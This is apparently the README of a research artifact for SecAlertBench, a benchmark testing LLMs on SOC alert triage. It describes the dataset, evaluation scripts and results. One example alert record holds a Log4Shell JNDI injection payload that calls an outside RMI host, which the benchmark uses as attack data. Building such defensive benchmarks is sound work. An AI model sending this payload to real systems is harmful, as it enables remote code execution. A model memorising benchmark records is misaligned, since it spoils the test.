This repository is the Artifact for the paper "SecAlertBench: Evaluating Large Language Models for Tier-1 Alert Triage in Security Operations Centers".
Enterprise security operations centers (SOCs) are heavily affected by alert fatigue, as analysts must triage massive volumes of noisy alerts while identifying the small fraction that truly warrant escalation. Although large language models (LLMs) have shown strong potential in cybersecurity, their capability for Tier-1 alert triage in real-world SOC environments remains unclear. To address this gap, we construct SecAlertBench, a benchmark built from alerts collected from the SOCs of three large enterprises. After standardization and annotation, SecAlertBench contains 8,322 alert logs spanning 241 alert types, with binary labels of Attack and Non-Attack. Using this benchmark, we systematically evaluate 16 LLMs for Tier-1 alert triage. The results show that current LLMs already exhibit promising but limited triage capability, achieving an average TPR of 79.71% and an average F1-score of 70.92%, while still suffering from a high average FPR of 44.13%, indicating a substantial trade-off between attack detection and false-positive control. Beyond aggregate performance, we further conduct multidimensional analyses of LLM behavior, such as decision consistency and sensitivity to experimental configurations, among other aspects. Based on these results, we summarize the key limitations and bottlenecks of LLMs in current SOC Tier-1 alert triage. Overall, our findings suggest that LLMs are promising assistants for Tier-1 alert triage, but substantial improvements are still required before they can be reliably deployed as standalone solutions in real-world SOCs.
This repository is organized into four main parts: 0x01 provides representative raw SOC alert examples, 0x02 contains the processed SecAlertBench dataset, 0x03 provides the evaluation scripts, and 0x04 stores the released evaluation results.
SecAlertBench/
├── README.md
├── requirements.txt
├── 0x01. Representative Raw SOC Alert Examples/
│ ├── enterprise_a_examples.json
│ ├── enterprise_b_examples.json
│ └── enterprise_c_examples.json
├── 0x02. Processed SecAlertBench Dataset/
│ ├── secalertbench.json
│ ├── secalertbench_attack.json
│ └── secalertbench_non_attack.json
├── 0x03. Evaluation Scripts/
│ ├── RQ1/
│ ├── RQ2/
│ │ ├── Exp1/
│ │ ├── Exp2/
│ │ └── Exp4/
│ └── RQ3/
└── 0x04. Evaluation Results/
├── RQ1/
├── RQ2/
│ ├── Exp1/
│ ├── Exp2/
│ ├── Exp3/
│ └── Exp4/
└── RQ3/
Our raw alert data was collected from the production SOC environments of three large enterprises. These alerts were generated by network-facing security monitoring and detection systems, including IDS/IPS, WAF, and related traffic inspection platforms.
Due to privacy and compliance considerations, we cannot release the complete raw enterprise alert logs. Instead, we provide several representative raw alert examples from each participating enterprise for reference. The alert examples from the three enterprises are stored separately in 0x01. Representative Raw SOC Alert Examples/.
The processed SecAlertBench dataset is stored in 0x02. Processed SecAlertBench Dataset/secalertbench.json. It contains 8,322 normalized alert records, including 2,496 Attack samples and 5,826 Non-Attack samples. For convenience, we also provide the label-specific splits secalertbench_attack.json and secalertbench_non_attack.json. Each record keeps the core fields required for Tier-1 alert triage, such as alert type, rule name, protocol metadata, source and destination information, request and response content, and the binary Label field. To protect sensitive information, source and destination IP addresses have been replaced with random IP addresses, and timestamp fields have been removed.
An example record is shown below:
{
"attack_type": "代码执行",
"dip": "141.137.162.228",
"host": "${jndi:rmi://10.132.233.206:62427/xnSae6Lv}",
"method": "POST",
"rule_name": "Apache Log4j2 远程代码执行漏洞(CVE-2021-44228/CVE-2021-45046)",
"rsp_body": "<html>\r\n<head><title>400 Bad Request</title></head>\r\n<body>\r\n<center><h1>400 Bad Request</h1></center>\r\n<hr><center>nginx</center>\r\n</body>\r\n</html>\r\n",
"kill_chain_all": "入侵:0x02000000|漏洞利用:0x02020000",
"proto": "http",
"xff": "",
"dport": 80,
"rsp_status": 400,
"parameter": "${jndi:rmi://10.132.233.206:62427/xnSae6Lv}",
"sip": "204.215.41.40",
"rsp_header": "HTTP/1.1 400 Bad Request\r\nServer: nginx\r\nDate: Fri, 09 Jan 2026 14:12:27 GMT\r\nContent-Type: text/html\r\nContent-Length: 150\r\nConnection: close\r\n\r\n",
"uri": "/",
"req_header": "POST / HTTP/1.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.12.4\r\nHost: ${jndi:rmi://10.132.233.206:62427/xnSae6Lv}\r\nContent-Length: 43\r\n\r\n",
"req_body": "${jndi:rmi://10.132.233.206:62427/xnSae6Lv}",
"sport": 35090,
"Label": "Attack"
}The evaluation scripts are stored in 0x03. Evaluation Scripts/. They are organized by research question and provide the code needed to reproduce the experiments on SecAlertBench. The released scripts have been cleaned for artifact use: model names or paths, API endpoints, API keys, dataset paths, output directories, and log directories should be supplied through command-line arguments instead of hard-coded local paths.
RQ1 contains the main Tier-1 alert triage evaluation scripts. run_rq1_api_test_eval.py evaluates API-based LLMs, run_rq1_transformers_test_eval.py evaluates local Hugging Face/Transformers models, and stats_rq1_summary_metrics.py summarizes the resulting TPR, FPR, precision, and F1-score.
For example, the RQ1 API-based evaluation script can be run with a uv environment as follows. Replace the API endpoint, API key, model name, and output paths with your own settings.
cd /home/dongxunsu/SecAlertBench
uv venv
uv pip install -r requirements.txt
uv run python "0x03. Evaluation Scripts/RQ1/run_rq1_api_test_eval.py" \
--url "https://api.example.com/v1/chat/completions" \
--api-key "YOUR_API_KEY" \
--model "YOUR_MODEL_NAME" \
--attack-data "0x02. Processed SecAlertBench Dataset/secalertbench_attack.json" \
--fp-data "0x02. Processed SecAlertBench Dataset/secalertbench_non_attack.json" \
--sample-per-class 1000 \
--seed 42 \
--threads 40 \
--timeout 60 \
--retry-times 10 \
--out-dir "outputs/rq1_api" \
--log-dir "logs/rq1_api"RQ2 contains scripts for analyzing model behavior under the paper's experiment organization. Exp1 corresponds to Response Determinism, Exp2 corresponds to Configuration Sensitivity, and Exp4 corresponds to Alert-Type Generalization. The released result files for Exp3 Reasoning Correctness are provided in 0x04. Evaluation Results/.
RQ3 contains scripts for local model latency and GPU-memory profiling. run_rq3_transformers_latency_eval.py supports a single model through --model or --model-path and multiple models through --model-paths; stats_rq3_latency_results.py summarizes latency and resource-usage statistics.
The evaluation results are stored in 0x04. Evaluation Results/. This directory contains the released outputs corresponding to the experiments in the paper, including model prediction files, metric summaries, configuration-experiment results, reasoning-judge summaries, and latency profiling records.
RQ1/ stores the main alert-triage prediction results for the evaluated models. Each model has a JSON result file, and these files can be used with the RQ1 statistics script to reproduce the main TPR, FPR, precision, and F1-score summaries.
RQ2/ stores behavior-analysis results across four experiment groups that follow the paper terminology. Exp1/ is Response Determinism and contains decision-consistency results under different temperature settings. Exp2/ is Configuration Sensitivity and contains prompting, quantization, and sampling configuration results. Exp3/ is Reasoning Correctness and contains reasoning-judge results with the corresponding summary CSV. Exp4/ is Alert-Type Generalization and contains alert-type-level metric summaries.
RQ3/ stores latency and resource-usage profiling outputs for selected Qwen models under zero-shot, few-shot, and CoT prompting settings. The directory includes per-run JSON summaries, per-sample latency CSV files, and selected Qwen latency summary files.